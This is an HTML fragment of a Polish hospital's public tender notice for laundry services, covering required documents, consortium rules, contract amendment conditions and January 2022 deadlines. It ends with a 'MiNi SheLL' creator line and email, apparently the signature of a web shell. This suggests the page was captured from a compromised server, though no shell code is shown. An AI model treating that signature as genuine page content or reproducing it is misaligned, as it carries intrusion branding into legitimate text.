5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełnienia warunku udziału w postępowaniu o<br/>udzielenie zamówienia publicznego, zamawiający żąda następujących podmiotowych środków<br/>dowodowych:<br/>a) kopię aktualnego zaświadczenie (np. opinia sanitarna) właściwego organu sanitarno -<br/>epidemiologicznego potwierdzającego, że pralnia, w której świadczona będzie usługa jest dopuszczona<br/>do świadczenia usług prania bielizny szpitalnej w tym stwierdzającego, że pralnia posiada barierę<br/>higieniczną;<br/>b) wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi<br/>zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi lub<br/>usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały<br/>wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów –<br/>oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być<br/>wystawione w okresie ostatnich 3 miesięcy - Wzór wykazu usług stanowi załącznik nr 5 do SWZ.<br/>c) wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu<br/>wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami –<br/>załącznik nr 4 do SWZ.<br/>d) dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy<br/>gwarancyjnej tego ubezpieczenia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> I.Do oferty wykonawca musi załączyć:<br/>1.Formularz ofertowy- załącznik nr 1 do SWZ.<br/>2.Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu oraz niepodleganiu<br/>wykluczeniu z postępowania o którym mowa w art. 125 ust.1 Pzp - załącznik nr 2 do SWZ. W<br/>przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składa<br/>każdy z Wykonawców.<br/>3.Oświadczenie podmiotu trzeciego o którym mowa w art. 125 ust.1 Pzp - załącznik nr 6 do SWZ<br/>(jeżeli dotyczy)<br/>4.Zobowiązanie podmiotu trzeciego (jeżeli dotyczy)<br/>5.Oświadczenie Wykonawców wspólnie ubiegających się o zamówienie – załącznik nr 7 do SWZ<br/>(jeżeli dotyczy)<br/>Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik.<br/>Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia.<br/>II.II. Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych lub<br/>zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby na<br/>zasadach określonych w art. 118 Pzp, przedstawienia podmiotowych środków dowodowych, o<br/>których mowa w Rozdziale 10 pkt. 2 lit. a) SWZ, dotyczących tych podmiotów, potwierdzających,<br/>że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Podmioty wspólnie ubiegające się o zamówienie (konsorcjum, spółka cywilna)<br/>2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (art. 58 ust.1 Pzp).<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>4. Do oferty wspólnej wykonawcy dołączają pełnomocnictwo.<br/>5. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>6. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia<br/>publicznego kopii umowy regulującej współpracę tych wykonawców.<br/>7. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 Pzp, jest spełniony, jeżeli co najmniej jeden z<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do<br/>prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których<br/>realizacji te uprawnienia są wymagane.<br/>8. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane.<br/>9. W przypadku, o którym mowa w art. 117 ust. 2 i 3 (pkt. 5.6, 5.7 SWZ) wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika,<br/>które usługi wykonają poszczególni wykonawcy. Wzór oświadczenia stanowi załącznik nr 7 do<br/>SWZ.<br/>10. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o<br/>którym mowa w art. 125 ust.1 Pzp składa każdy z wykonawców. Oświadczenia te potwierdzają<br/>brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w<br/>jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu (art. 125 ust.<br/>4 Pzp).<br/>11. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>12. Wykonawcy wspólnie obiegający się o udzielenie zamówienia ponoszą solidarną<br/>odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania<br/>umowy (art. 445 Pzp) (jeżeli Zamawiający wymagał jego wniesienia). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza dokonywanie zmian umowy zgodnie z art. 455 ustawy pzp w tym<br/>także w zakresie postanowień zawartej umowy w stosunku do treści oferty, na podstawie której<br/>dokonano wyboru Wykonawcy, w przypadku wystąpienia następujących warunków:<br/>1) zmniejszenia zakresu rzeczowego zamówienia poprzez rezygnację z części zamówienia, z<br/>przyczyn, których nie dało się przewidzieć w chwili zawierania umowy lub uzasadnionych<br/>potrzebami Zamawiającego;<br/>2) gdy nowy wykonawca ma zastąpić dotychczasowego wykonawcę:<br/>a) w wyniku sukcesji, wstępując w prawa i obowiązki wykonawcy, w następstwie przejęcia,<br/>połączenia, podziału, przekształcenia, upadłości, restrukturyzacji, dziedziczenia lub nabycia<br/>dotychczasowego wykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełnia warunki<br/>udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to<br/>za sobą innych istotnych zmian umowy, a także nie ma na celu uniknięcia stosowania przepisów<br/>ustawy, lub<br/>3) jeżeli konieczność zmiany umowy spowodowana jest okolicznościami, których zamawiający,<br/>działając z należytą starannością, nie mógł przewidzieć, o ile zmiana nie modyfikuje ogólnego<br/>charakteru umowy a wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50%<br/>wartości pierwotnej umowy;<br/>4) wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo<br/>zachowania należytej staranności;<br/>5) zlecenie podwykonawstwa w sytuacji, gdy Wykonawca w swojej ofercie oświadczył, że<br/>wykona zamówienie samodzielnie lub wprowadzenie dalszego podwykonawcy;<br/>6) regulacji prawnych wprowadzonych w życie po dniu podpisania umowy, wywołujących<br/>potrzebę zmiany umowy wraz ze skutkiem wprowadzenia takiej zmiany. a) stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>b) wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki<br/>godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym<br/>wynagrodzeniu za pracę,<br/>c) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub<br/>wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne,<br/>d) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których<br/>mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz.U.<br/>poz. 2215 oraz z 2019 r. poz. 1074 i 1572)<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę.<br/>2. Obowiązek wykazania wpływu zmian, na koszty wykonania zamówienia należy do<br/>Wykonawcy pod rygorem odmowy dokonania zmiany umowy przez Zamawiającego.<br/>3. W wypadku zmiany, o której mowa w ust. 1 lit. a) wartość netto wynagrodzenia Wykonawcy<br/>nie zmieni się.<br/>4. W sytuacji wystąpienia okoliczności wskazanych w ust. 1 lit. a) wykonawca składa do<br/>Zamawiającego pisemny wniosek o zmianę umowy o zamówienie publiczne w zakresie płatności<br/>wynikających z faktur wystawionych po wejściu w życie przepisów zmieniających stawkę<br/>podatku od towarów i usług. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://szpital-swidnica.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-12 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-10</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com